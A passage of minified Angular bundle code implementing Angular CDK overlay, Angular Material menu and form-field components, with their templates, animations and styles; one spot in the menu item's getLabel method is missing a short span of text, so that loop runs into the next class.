new(e||t)(Ee(As),Ee(ho),Ee(fo),Ee(aF),Ee(Cr,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-connected-overlay",""],["","connected-overlay",""],["","cdkConnectedOverlay",""]],inputs:{origin:["cdkConnectedOverlayOrigin","origin"],positions:["cdkConnectedOverlayPositions","positions"],positionStrategy:["cdkConnectedOverlayPositionStrategy","positionStrategy"],offsetX:["cdkConnectedOverlayOffsetX","offsetX"],offsetY:["cdkConnectedOverlayOffsetY","offsetY"],width:["cdkConnectedOverlayWidth","width"],height:["cdkConnectedOverlayHeight","height"],minWidth:["cdkConnectedOverlayMinWidth","minWidth"],minHeight:["cdkConnectedOverlayMinHeight","minHeight"],backdropClass:["cdkConnectedOverlayBackdropClass","backdropClass"],panelClass:["cdkConnectedOverlayPanelClass","panelClass"],viewportMargin:["cdkConnectedOverlayViewportMargin","viewportMargin"],scrollStrategy:["cdkConnectedOverlayScrollStrategy","scrollStrategy"],open:["cdkConnectedOverlayOpen","open"],disableClose:["cdkConnectedOverlayDisableClose","disableClose"],transformOriginSelector:["cdkConnectedOverlayTransformOriginOn","transformOriginSelector"],hasBackdrop:["cdkConnectedOverlayHasBackdrop","hasBackdrop"],lockPosition:["cdkConnectedOverlayLockPosition","lockPosition"],flexibleDimensions:["cdkConnectedOverlayFlexibleDimensions","flexibleDimensions"],growAfterOpen:["cdkConnectedOverlayGrowAfterOpen","growAfterOpen"],push:["cdkConnectedOverlayPush","push"]},outputs:{backdropClick:"backdropClick",positionChange:"positionChange",attach:"attach",detach:"detach",overlayKeydown:"overlayKeydown",overlayOutsideClick:"overlayOutsideClick"},exportAs:["cdkConnectedOverlay"],features:[sa]}),t})();const K_e={provide:aF,deps:[As],useFactory:function $_e(t){return()=>t.scrollStrategies.reposition()}};let bu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[As,K_e],imports:[R1,yu,Hy,Hy]}),t})();const X_e=["mat-menu-item",""];function Y_e(t,a){1&t&&(fi(),m(0,"svg",2),it(1,"polygon",3),u())}const nF=["*"];function J_e(t,a){if(1&t){const e=Ye();m(0,"div",0),he("keydown",function(n){return be(e),Me(V()._handleKeydown(n))})("click",function(){return be(e),Me(V().closed.emit("click"))})("@transformMenu.start",function(n){return be(e),Me(V()._onAnimationStart(n))})("@transformMenu.done",function(n){return be(e),Me(V()._onAnimationDone(n))}),m(1,"div",1),va(2),u()()}if(2&t){const e=V();F("id",e.panelId)("ngClass",e._classList)("@transformMenu",e._panelAnimationState),Rt("aria-label",e.ariaLabel||null)("aria-labelledby",e.ariaLabelledby||null)("aria-describedby",e.ariaDescribedby||null)}}const tA={transformMenu:nr("transformMenu",[sn("void",zi({opacity:0,transform:"scale(0.8)"})),gn("void => enter",En("120ms cubic-bezier(0, 0, 0.2, 1)",zi({opacity:1,transform:"scale(1)"}))),gn("* => void",En("100ms 25ms linear",zi({opacity:0})))]),fadeInItems:nr("fadeInItems",[sn("showing",zi({opacity:1})),gn("void => *",[zi({opacity:0}),En("400ms 100ms cubic-bezier(0.55, 0, 0.55, 0.2)")])])},oF=new ni("MatMenuContent");let Z_e=(()=>{class t{constructor(e,i,n,r,c,d,T){this._template=e,this._componentFactoryResolver=i,this._appRef=n,this._injector=r,this._viewContainerRef=c,this._document=d,this._changeDetectorRef=T,this._attached=new J}attach(e={}){var i;this._portal||(this._portal=new Mm(this._template,this._viewContainerRef)),this.detach(),this._outlet||(this._outlet=new Zw(this._document.createElement("div"),this._componentFactoryResolver,this._appRef,this._injector));const n=this._template.elementRef.nativeElement;n.parentNode.insertBefore(this._outlet.outletElement,n),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck(),this._portal.attach(this._outlet,e),this._attached.next()}detach(){this._portal.isAttached&&this._portal.detach()}ngOnDestroy(){this._outlet&&this._outlet.dispose()}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(On),Ee(Yf),Ee(Ko),Ee(fo),Ee(ga),Ee(Ma))},t.\u0275dir=Ot({type:t}),t})(),el=(()=>{class t extends Z_e{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["ng-template","matMenuContent",""]],features:[ki([{provide:oF,useExisting:t}]),ci]}),t})();const a8=new ni("MAT_MENU_PANEL"),ege=El(Zc(class{}));let qo=(()=>{class t extends ege{constructor(e,i,n,r,c){var d;super(),this._elementRef=e,this._document=i,this._focusMonitor=n,this._parentMenu=r,this._changeDetectorRef=c,this.role="menuitem",this._hovered=new J,this._focused=new J,this._highlighted=!1,this._triggersSubmenu=!1,null===(d=null==r?void 0:r.addItem)||void 0===d||d.call(r,this)}focus(e,i){this._focusMonitor&&e?this._focusMonitor.focusVia(this._getHostElement(),e,i):this._getHostElement().focus(i),this._focused.next(this)}ngAfterViewInit(){this._focusMonitor&&this._focusMonitor.monitor(this._elementRef,!1)}ngOnDestroy(){this._focusMonitor&&this._focusMonitor.stopMonitoring(this._elementRef),this._parentMenu&&this._parentMenu.removeItem&&this._parentMenu.removeItem(this),this._hovered.complete(),this._focused.complete()}_getTabIndex(){return this.disabled?"-1":"0"}_getHostElement(){return this._elementRef.nativeElement}_checkDisabled(e){this.disabled&&(e.preventDefault(),e.stopPropagation())}_handleMouseEnter(){this._hovered.next(this)}getLabel(){var e;const i=this._elementRef.nativeElement.cloneNode(!0),n=i.querySelectorAll("mat-icon, .material-icons");for(let r=0;r{class t{constructor(e,i,n,r){this._elementRef=e,this._ngZone=i,this._defaultOptions=n,this._changeDetectorRef=r,this._xPosition=this._defaultOptions.xPosition,this._yPosition=this._defaultOptions.yPosition,this._directDescendantItems=new Cd,this._tabSubscription=I.EMPTY,this._classList={},this._panelAnimationState="void",this._animationDone=new J,this.overlayPanelClass=this._defaultOptions.overlayPanelClass||"",this.backdropClass=this._defaultOptions.backdropClass,this._overlapTrigger=this._defaultOptions.overlapTrigger,this._hasBackdrop=this._defaultOptions.hasBackdrop,this.closed=new Tt,this.close=this.closed,this.panelId="mat-menu-panel-"+ige++}get xPosition(){return this._xPosition}set xPosition(e){this._xPosition=e,this.setPositionClasses()}get yPosition(){return this._yPosition}set yPosition(e){this._yPosition=e,this.setPositionClasses()}get overlapTrigger(){return this._overlapTrigger}set overlapTrigger(e){this._overlapTrigger=wi(e)}get hasBackdrop(){return this._hasBackdrop}set hasBackdrop(e){this._hasBackdrop=wi(e)}set panelClass(e){const i=this._previousPanelClass;i&&i.length&&i.split(" ").forEach(n=>{this._classList[n]=!1}),this._previousPanelClass=e,e&&e.length&&(e.split(" ").forEach(n=>{this._classList[n]=!0}),this._elementRef.nativeElement.className="")}get classList(){return this.panelClass}set classList(e){this.panelClass=e}ngOnInit(){this.setPositionClasses()}ngAfterContentInit(){this._updateDirectDescendants(),this._keyManager=new L1(this._directDescendantItems).withWrap().withTypeAhead().withHomeAndEnd(),this._tabSubscription=this._keyManager.tabOut.subscribe(()=>this.closed.emit("tab")),this._directDescendantItems.changes.pipe(Ro(this._directDescendantItems),Ur(e=>ra(...e.map(i=>i._focused)))).subscribe(e=>this._keyManager.updateActiveItem(e)),this._directDescendantItems.changes.subscribe(e=>{var i;const n=this._keyManager;if("enter"===this._panelAnimationState&&(null===(i=n.activeItem)||void 0===i?void 0:i._hasFocus())){const r=e.toArray(),c=Math.max(0,Math.min(r.length-1,n.activeItemIndex||0));r[c]&&!r[c].disabled?n.setActiveItem(c):n.setNextItemActive()}})}ngOnDestroy(){this._directDescendantItems.destroy(),this._tabSubscription.unsubscribe(),this.closed.complete()}_hovered(){return this._directDescendantItems.changes.pipe(Ro(this._directDescendantItems),Ur(i=>ra(...i.map(n=>n._hovered))))}addItem(e){}removeItem(e){}_handleKeydown(e){const i=e.keyCode,n=this._keyManager;switch(i){case 27:es(e)||(e.preventDefault(),this.closed.emit("keydown"));break;case 37:this.parentMenu&&"ltr"===this.direction&&this.closed.emit("keydown");break;case 39:this.parentMenu&&"rtl"===this.direction&&this.closed.emit("keydown");break;default:return(38===i||40===i)&&n.setFocusOrigin("keyboard"),void n.onKeydown(e)}e.stopPropagation()}focusFirstItem(e="program"){this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{let i=null;if(this._directDescendantItems.length&&(i=this._directDescendantItems.first._getHostElement().closest('[role="menu"]')),!i||!i.contains(document.activeElement)){const n=this._keyManager;n.setFocusOrigin(e).setFirstItemActive(),!n.activeItem&&i&&i.focus()}})}resetActiveItem(){this._keyManager.setActiveItem(-1)}setElevation(e){const i=Math.min(this._baseElevation+e,24),n=`${this._elevationPrefix}${i}`,r=Object.keys(this._classList).find(c=>c.startsWith(this._elevationPrefix));(!r||r===this._previousElevation)&&(this._previousElevation&&(this._classList[this._previousElevation]=!1),this._classList[n]=!0,this._previousElevation=n)}setPositionClasses(e=this.xPosition,i=this.yPosition){var n;const r=this._classList;r["mat-menu-before"]="before"===e,r["mat-menu-after"]="after"===e,r["mat-menu-above"]="above"===i,r["mat-menu-below"]="below"===i,null===(n=this._changeDetectorRef)||void 0===n||n.markForCheck()}_startAnimation(){this._panelAnimationState="enter"}_resetAnimation(){this._panelAnimationState="void"}_onAnimationDone(e){this._animationDone.next(e),this._isAnimating=!1}_onAnimationStart(e){this._isAnimating=!0,"enter"===e.toState&&0===this._keyManager.activeItemIndex&&(e.element.scrollTop=0)}_updateDirectDescendants(){this._allItems.changes.pipe(Ro(this._allItems)).subscribe(e=>{this._directDescendantItems.reset(e.filter(i=>i._parentMenu===this)),this._directDescendantItems.notifyOnChanges()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(rF),Ee(Ma))},t.\u0275dir=Ot({type:t,contentQueries:function(e,i,n){if(1&e&&(fa(n,oF,5),fa(n,qo,5),fa(n,qo,4)),2&e){let r;Vt(r=Bt())&&(i.lazyContent=r.first),Vt(r=Bt())&&(i._allItems=r),Vt(r=Bt())&&(i.items=r)}},viewQuery:function(e,i){if(1&e&&Mi(ho,5),2&e){let n;Vt(n=Bt())&&(i.templateRef=n.first)}},inputs:{backdropClass:"backdropClass",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],xPosition:"xPosition",yPosition:"yPosition",overlapTrigger:"overlapTrigger",hasBackdrop:"hasBackdrop",panelClass:["class","panelClass"],classList:"classList"},outputs:{closed:"closed",close:"close"}}),t})(),Xo=(()=>{class t extends rb{constructor(e,i,n,r){super(e,i,n,r),this._elevationPrefix="mat-elevation-z",this._baseElevation=4}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(rF),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-menu"]],hostVars:3,hostBindings:function(e,i){2&e&&Rt("aria-label",null)("aria-labelledby",null)("aria-describedby",null)},exportAs:["matMenu"],features:[ki([{provide:a8,useExisting:t}]),ci],ngContentSelectors:nF,decls:1,vars:0,consts:[["tabindex","-1","role","menu",1,"mat-menu-panel",3,"id","ngClass","keydown","click"],[1,"mat-menu-content"]],template:function(e,i){1&e&&(Jn(),ne(0,J_e,3,6,"ng-template"))},dependencies:[ig],styles:['mat-menu{display:none}.mat-menu-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;max-height:calc(100vh - 48px);border-radius:4px;outline:0;min-height:64px;position:relative}.mat-menu-panel.ng-animating{pointer-events:none}.cdk-high-contrast-active .mat-menu-panel{outline:solid 1px}.mat-menu-content:not(:empty){padding-top:8px;padding-bottom:8px}.mat-menu-item{-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;position:relative}.mat-menu-item::-moz-focus-inner{border:0}.mat-menu-item[disabled]{cursor:default}[dir=rtl] .mat-menu-item{text-align:right}.mat-menu-item .mat-icon{margin-right:16px;vertical-align:middle}.mat-menu-item .mat-icon svg{vertical-align:top}[dir=rtl] .mat-menu-item .mat-icon{margin-left:16px;margin-right:0}.mat-menu-item[disabled]::after{display:block;position:absolute;content:"";top:0;left:0;bottom:0;right:0}.cdk-high-contrast-active .mat-menu-item{margin-top:1px}.mat-menu-item-submenu-trigger{padding-right:32px}[dir=rtl] .mat-menu-item-submenu-trigger{padding-right:16px;padding-left:32px}.mat-menu-submenu-icon{position:absolute;top:50%;right:16px;transform:translateY(-50%);width:5px;height:10px;fill:currentColor}[dir=rtl] .mat-menu-submenu-icon{right:auto;left:16px;transform:translateY(-50%) scaleX(-1)}.cdk-high-contrast-active .mat-menu-submenu-icon{fill:CanvasText}button.mat-menu-item{width:100%}.mat-menu-item .mat-menu-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}'],encapsulation:2,data:{animation:[tA.transformMenu,tA.fadeInItems]},changeDetection:0}),t})();const n8=new ni("mat-menu-scroll-strategy"),nge={provide:n8,deps:[As],useFactory:function age(t){return()=>t.scrollStrategies.reposition()}},sF=ym({passive:!0});let oge=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q){this._overlay=e,this._element=i,this._viewContainerRef=n,this._menuItemInstance=d,this._dir=T,this._focusMonitor=k,this._ngZone=q,this._overlayRef=null,this._menuOpen=!1,this._closingActionsSubscription=I.EMPTY,this._hoverSubscription=I.EMPTY,this._menuCloseSubscription=I.EMPTY,this._handleTouchStart=Y=>{F3(Y)||(this._openedBy="touch")},this._openedBy=void 0,this.restoreFocus=!0,this.menuOpened=new Tt,this.onMenuOpen=this.menuOpened,this.menuClosed=new Tt,this.onMenuClose=this.menuClosed,this._scrollStrategy=r,this._parentMaterialMenu=c instanceof rb?c:void 0,i.nativeElement.addEventListener("touchstart",this._handleTouchStart,sF),d&&(d._triggersSubmenu=this.triggersSubmenu())}get _deprecatedMatMenuTriggerFor(){return this.menu}set _deprecatedMatMenuTriggerFor(e){this.menu=e}get menu(){return this._menu}set menu(e){e!==this._menu&&(this._menu=e,this._menuCloseSubscription.unsubscribe(),e&&(this._menuCloseSubscription=e.close.subscribe(i=>{this._destroyMenu(i),("click"===i||"tab"===i)&&this._parentMaterialMenu&&this._parentMaterialMenu.closed.emit(i)})))}ngAfterContentInit(){this._handleHover()}ngOnDestroy(){this._overlayRef&&(this._overlayRef.dispose(),this._overlayRef=null),this._element.nativeElement.removeEventListener("touchstart",this._handleTouchStart,sF),this._menuCloseSubscription.unsubscribe(),this._closingActionsSubscription.unsubscribe(),this._hoverSubscription.unsubscribe()}get menuOpen(){return this._menuOpen}get dir(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}triggersSubmenu(){return!(!this._menuItemInstance||!this._parentMaterialMenu)}toggleMenu(){return this._menuOpen?this.closeMenu():this.openMenu()}openMenu(){const e=this.menu;if(this._menuOpen||!e)return;const i=this._createOverlay(e),n=i.getConfig(),r=n.positionStrategy;this._setPosition(e,r),n.hasBackdrop=null==e.hasBackdrop?!this.triggersSubmenu():e.hasBackdrop,i.attach(this._getPortal(e)),e.lazyContent&&e.lazyContent.attach(this.menuData),this._closingActionsSubscription=this._menuClosingActions().subscribe(()=>this.closeMenu()),this._initMenu(e),e instanceof rb&&(e._startAnimation(),e._directDescendantItems.changes.pipe(ea(e.close)).subscribe(()=>{r.withLockedPosition(!1).reapplyLastPosition(),r.withLockedPosition(!0)}))}closeMenu(){var e;null===(e=this.menu)||void 0===e||e.close.emit()}focus(e,i){this._focusMonitor&&e?this._focusMonitor.focusVia(this._element,e,i):this._element.nativeElement.focus(i)}updatePosition(){var e;null===(e=this._overlayRef)||void 0===e||e.updatePosition()}_destroyMenu(e){var i;if(!this._overlayRef||!this.menuOpen)return;const n=this.menu;this._closingActionsSubscription.unsubscribe(),this._overlayRef.detach(),this.restoreFocus&&("keydown"===e||!this._openedBy||!this.triggersSubmenu())&&this.focus(this._openedBy),this._openedBy=void 0,n instanceof rb?(n._resetAnimation(),n.lazyContent?n._animationDone.pipe(Dn(r=>"void"===r.toState),Cn(1),ea(n.lazyContent._attached)).subscribe({next:()=>n.lazyContent.detach(),complete:()=>this._setIsMenuOpen(!1)}):this._setIsMenuOpen(!1)):(this._setIsMenuOpen(!1),null===(i=null==n?void 0:n.lazyContent)||void 0===i||i.detach())}_initMenu(e){e.parentMenu=this.triggersSubmenu()?this._parentMaterialMenu:void 0,e.direction=this.dir,this._setMenuElevation(e),e.focusFirstItem(this._openedBy||"program"),this._setIsMenuOpen(!0)}_setMenuElevation(e){if(e.setElevation){let i=0,n=e.parentMenu;for(;n;)i++,n=n.parentMenu;e.setElevation(i)}}_setIsMenuOpen(e){this._menuOpen=e,this._menuOpen?this.menuOpened.emit():this.menuClosed.emit(),this.triggersSubmenu()&&this._menuItemInstance._setHighlighted(e)}_createOverlay(e){if(!this._overlayRef){const i=this._getOverlayConfig(e);this._subscribeToPositions(e,i.positionStrategy),this._overlayRef=this._overlay.create(i),this._overlayRef.keydownEvents().subscribe()}return this._overlayRef}_getOverlayConfig(e){return new yg({positionStrategy:this._overlay.position().flexibleConnectedTo(this._element).withLockedPosition().withGrowAfterOpen().withTransformOriginOn(".mat-menu-panel, .mat-mdc-menu-panel"),backdropClass:e.backdropClass||"cdk-overlay-transparent-backdrop",panelClass:e.overlayPanelClass,scrollStrategy:this._scrollStrategy(),direction:this._dir})}_subscribeToPositions(e,i){e.setPositionClasses&&i.positionChanges.subscribe(n=>{const r="start"===n.connectionPair.overlayX?"after":"before",c="top"===n.connectionPair.overlayY?"below":"above";this._ngZone?this._ngZone.run(()=>e.setPositionClasses(r,c)):e.setPositionClasses(r,c)})}_setPosition(e,i){let[n,r]="before"===e.xPosition?["end","start"]:["start","end"],[c,d]="above"===e.yPosition?["bottom","top"]:["top","bottom"],[T,k]=[c,d],[q,Y]=[n,r],te=0;if(this.triggersSubmenu()){if(Y=n="before"===e.xPosition?"start":"end",r=q="end"===n?"start":"end",this._parentMaterialMenu){if(null==this._parentInnerPadding){const pe=this._parentMaterialMenu.items.first;this._parentInnerPadding=pe?pe._getHostElement().offsetTop:0}te="bottom"===c?this._parentInnerPadding:-this._parentInnerPadding}}else e.overlapTrigger||(T="top"===c?"bottom":"top",k="top"===d?"bottom":"top");i.withPositions([{originX:n,originY:T,overlayX:q,overlayY:c,offsetY:te},{originX:r,originY:T,overlayX:Y,overlayY:c,offsetY:te},{originX:n,originY:k,overlayX:q,overlayY:d,offsetY:-te},{originX:r,originY:k,overlayX:Y,overlayY:d,offsetY:-te}])}_menuClosingActions(){const e=this._overlayRef.backdropClick(),i=this._overlayRef.detachments();return ra(e,this._parentMaterialMenu?this._parentMaterialMenu.closed:Bi(),this._parentMaterialMenu?this._parentMaterialMenu._hovered().pipe(Dn(c=>c!==this._menuItemInstance),Dn(()=>this._menuOpen)):Bi(),i)}_handleMousedown(e){W3(e)||(this._openedBy=0===e.button?"mouse":void 0,this.triggersSubmenu()&&e.preventDefault())}_handleKeydown(e){const i=e.keyCode;(13===i||32===i)&&(this._openedBy="keyboard"),this.triggersSubmenu()&&(39===i&&"ltr"===this.dir||37===i&&"rtl"===this.dir)&&(this._openedBy="keyboard",this.openMenu())}_handleClick(e){this.triggersSubmenu()?(e.stopPropagation(),this.openMenu()):this.toggleMenu()}_handleHover(){!this.triggersSubmenu()||!this._parentMaterialMenu||(this._hoverSubscription=this._parentMaterialMenu._hovered().pipe(Dn(e=>e===this._menuItemInstance&&!e.disabled),Z3(0,dw)).subscribe(()=>{this._openedBy="mouse",this.menu instanceof rb&&this.menu._isAnimating?this.menu._animationDone.pipe(Cn(1),Z3(0,dw),ea(this._parentMaterialMenu._hovered())).subscribe(()=>this.openMenu()):this.openMenu()}))}_getPortal(e){return(!this._portal||this._portal.templateRef!==e.templateRef)&&(this._portal=new Mm(e.templateRef,this._viewContainerRef)),this._portal}}return t.\u0275fac=function(e){return new(e||t)(Ee(As),Ee(mi),Ee(fo),Ee(n8),Ee(a8,8),Ee(qo,10),Ee(Cr,8),Ee(js),Ee(qi))},t.\u0275dir=Ot({type:t,hostVars:3,hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})("mousedown",function(r){return i._handleMousedown(r)})("keydown",function(r){return i._handleKeydown(r)}),2&e&&Rt("aria-haspopup",i.menu?"menu":null)("aria-expanded",i.menuOpen||null)("aria-controls",i.menuOpen?i.menu.panelId:null)},inputs:{_deprecatedMatMenuTriggerFor:["mat-menu-trigger-for","_deprecatedMatMenuTriggerFor"],menu:["matMenuTriggerFor","menu"],menuData:["matMenuTriggerData","menuData"],restoreFocus:["matMenuTriggerRestoreFocus","restoreFocus"]},outputs:{menuOpened:"menuOpened",onMenuOpen:"onMenuOpen",menuClosed:"menuClosed",onMenuClose:"onMenuClose"}}),t})(),po=(()=>{class t extends oge{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","mat-menu-trigger-for",""],["","matMenuTriggerFor",""]],hostAttrs:[1,"mat-menu-trigger"],exportAs:["matMenuTrigger"],features:[ci]}),t})(),o8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[nge],imports:[rn,la,Od,bu,uu,la]}),t})();const rge=["connectionContainer"],sge=["inputContainer"],cge=["label"];function lge(t,a){1&t&&(bt(0),m(1,"div",14),it(2,"div",15)(3,"div",16)(4,"div",17),u(),m(5,"div",18),it(6,"div",15)(7,"div",16)(8,"div",17),u(),Mt())}function dge(t,a){if(1&t){const e=Ye();m(0,"div",19),he("cdkObserveContent",function(){return be(e),Me(V().updateOutlineGap())}),va(1,1),u()}2&t&&F("cdkObserveContentDisabled","outline"!=V().appearance)}function mge(t,a){if(1&t&&(bt(0),va(1,2),m(2,"span"),s(3),u(),Mt()),2&t){const e=V(2);g(3),ke(e._control.placeholder)}}function uge(t,a){1&t&&va(0,3,["*ngSwitchCase","true"])}function hge(t,a){1&t&&(m(0,"span",23),s(1," *"),u())}function fge(t,a){if(1&t){const e=Ye();m(0,"label",20,21),he("cdkObserveContent",function(){return be(e),Me(V().updateOutlineGap())}),ne(2,mge,4,1,"ng-container",12),ne(3,uge,1,0,"ng-content",12),ne(4,hge,2,0,"span",22),u()}if(2&t){const e=V();Ct("mat-empty",e._control.empty&&!e._shouldAlwaysFloat())("mat-form-field-empty",e._control.empty&&!e._shouldAlwaysFloat())("mat-accent","accent"==e.color)("mat-warn","warn"==e.color),F("cdkObserveContentDisabled","outline"!=e.appearance)("id",e._labelId)("ngSwitch",e._hasLabel()),Rt("for",e._control.id)("aria-owns",e._control.id),g(2),F("ngSwitchCase",!1),g(1),F("ngSwitchCase",!0),g(1),F("ngIf",!e.hideRequiredMarker&&e._control.required&&!e._control.disabled)}}function pge(t,a){1&t&&(m(0,"div",24),va(1,4),u())}function _ge(t,a){if(1&t&&(m(0,"div",25),it(1,"span",26),u()),2&t){const e=V();g(1),Ct("mat-accent","accent"==e.color)("mat-warn","warn"==e.color)}}function gge(t,a){1&t&&(m(0,"div"),va(1,5),u()),2&t&&F("@transitionMessages",V()._subscriptAnimationState)}function Cge(t,a){if(1&t&&(m(0,"div",30),s(1),u()),2&t){const e=V(2);F("id",e._hintLabelId),g(1),ke(e.hintLabel)}}function yge(t,a){if(1&t&&(m(0,"div",27),ne(1,Cge,2,2,"div",28),va(2,6),it(3,"div",29),va(4,7),u()),2&t){const e=V();F("@transitionMessages",e._subscriptAnimationState),g(1),F("ngIf",e.hintLabel)}}const bge=["*",[["","matPrefix",""]],[["mat-placeholder"]],[["mat-label"]],[["","matSuffix",""]],[["mat-error"]],[["mat-hint",3,"align","end"]],[["mat-hint","align","end"]]],Mge=["*","[matPrefix]","mat-placeholder","mat-label","[matSuffix]","mat-error","mat-hint:not([align='end'])","mat-hint[align='end']"];let vge=0;const cF=new ni("MatError");let Age=(()=>{class t{constructor(e,i){this.id="mat-error-"+vge++,e||i.nativeElement.setAttribute("aria-live","polite")}}return t.\u0275fac=function(e){return new(e||t)(Vr("aria-live"),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["mat-error"]],hostAttrs:["aria-atomic","true",1,"mat-error"],hostVars:1,hostBindings:function(e,i){2&e&&Rt("id",i.id)},inputs:{id:"id"},features:[ki([{provide:cF,useExisting:t}])]}),t})();const Tge={transitionMessages:nr("transitionMessages",[sn("enter",zi({opacity:1,transform:"translateY(0%)"})),gn("void => enter",[zi({opacity:0,transform:"translateY(-5px)"}),En("300ms cubic-bezier(0.55, 0, 0.55, 0.2)")])])};let sb=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t}),t})(),Ege=0;const lF=new ni("MatHint");let fp=(()=>{class t{constructor(){this.align="start",this.id="mat-hint-"+Ege++}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-hint"]],hostAttrs:[1,"mat-hint"],hostVars:4,hostBindings:function(e,i){2&e&&(Rt("id",i.id)("align",null),Ct("mat-form-field-hint-end","end"===i.align))},inputs:{align:"align",id:"id"},features:[ki([{provide:lF,useExisting:t}])]}),t})(),un=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-label"]]}),t})(),Dge=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-placeholder"]]}),t})();const dF=new ni("MatPrefix");let mF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","matPrefix",""]],features:[ki([{provide:dF,useExisting:t}])]}),t})();const uF=new ni("MatSuffix");let jr=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","matSuffix",""]],features:[ki([{provide:uF,useExisting:t}])]}),t})(),hF=0;const wge=Pd(class{constructor(t){this._elementRef=t}},"primary"),Ige=new ni("MAT_FORM_FIELD_DEFAULT_OPTIONS"),cb=new ni("MatFormField");let nn=(()=>{class t extends wge{constructor(e,i,n,r,c,d,T){super(e),this._changeDetectorRef=i,this._dir=n,this._defaults=r,this._platform=c,this._ngZone=d,this._outlineGapCalculationNeededImmediately=!1,this._outlineGapCalculationNeededOnStable=!1,this._destroyed=new J,this._hideRequiredMarker=!1,this._showAlwaysAnimate=!1,this._subscriptAnimationState="",this._hintLabel="",this._hintLabelId="mat-hint-"+hF++,this._labelId="mat-form-field-label-"+hF++,this.floatLabel=this._getDefaultFloatLabelState(),this._animationsEnabled="NoopAnimations"!==T,this.appearance=(null==r?void 0:r.appearance)||"legacy",r&&(this._hideRequiredMarker=Boolean(r.hideRequiredMarker),r.color&&(this.color=this.defaultColor=r.color))}get appearance(){return this._appearance}set appearance(e){var i;const n=this._appearance;this._appearance=e||(null===(i=this._defaults)||void 0===i?void 0:i.appearance)||"legacy","outline"===this._appearance&&n!==e&&(this._outlineGapCalculationNeededOnStable=!0)}get hideRequiredMarker(){return this._hideRequiredMarker}set hideRequiredMarker(e){this._hideRequiredMarker=wi(e)}_shouldAlwaysFloat(){return"always"===this.floatLabel&&!this._showAlwaysAnimate}_canLabelFloat(){return"never"!==this.floatLabel}get hintLabel(){return this._hintLabel}set hintLabel(e){this._hintLabel=e,this._processHints()}get floatLabel(){return"legacy"!==this.appearance&&"never"===this._floatLabel?"auto":this._floatLabel}set floatLabel(e){e!==this._floatLabel&&(this._floatLabel=e||this._getDefaultFloatLabelState(),this._changeDetectorRef.markForCheck())}get _control(){return this._explicitFormFieldControl||this._controlNonStatic||this._controlStatic}set _control(e){this._explicitFormFieldControl=e}getLabelId(){return this._hasFloatingLabel()?this._labelId:null}getConnectedOverlayOrigin(){return this._connectionContainerRef||this._elementRef}ngAfterContentInit(){this._validateControlChild();const e=this._control;e.controlType&&this._elementRef.nativeElement.classList.add(`mat-form-field-type-${e.controlType}`),e.stateChanges.pipe(Ro(null)).subscribe(()=>{this._validatePlaceholders(),this._syncDescribedByIds(),this._changeDetectorRef.markForCheck()}),e.ngControl&&e.ngControl.valueChanges&&e.ngControl.valueChanges.pipe(ea(this._destroyed)).subscribe(()=>this._changeDetectorRef.markForCheck()),this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.pipe(ea(this._destroyed)).subscribe(()=>{this._outlineGapCalculationNeededOnStable&&this.updateOutlineGap()})}),ra(this._prefixChildren.changes,this._suffixChildren.changes).subscribe(()=>{this._outlineGapCalculationNeededOnStable=!0,this._changeDetectorRef.markForCheck()}),this._hintChildren.changes.pipe(Ro(null)).subscribe(()=>{this._processHints(),this._changeDetectorRef.markForCheck()}),this._errorChildren.changes.pipe(Ro(null)).subscribe(()=>{this._syncDescribedByIds(),this._changeDetectorRef.markForCheck()}),this._dir&&this._dir.change.pipe(ea(this._destroyed)).subscribe(()=>{"function"==typeof requestAnimationFrame?this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>this.updateOutlineGap())}):this.updateOutlineGap()})}ngAfterContentChecked(){this._validateControlChild(),this._outlineGapCalculationNeededImmediately&&this.updateOutlineGap()}ngAfterViewInit(){this._subscriptAnimationState="enter",this._changeDetectorRef.detectChanges()}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_shouldForward(e){const i=this._control?this._control.ngControl:null;return i&&i[e]}_hasPlaceholder(){return!!(this._control&&this._control.placeholder||this._placeholderChild)}_hasLabel(){return!(!this._labelChildNonStatic&&!this._labelChildStatic)}_shouldLabelFloat(){return 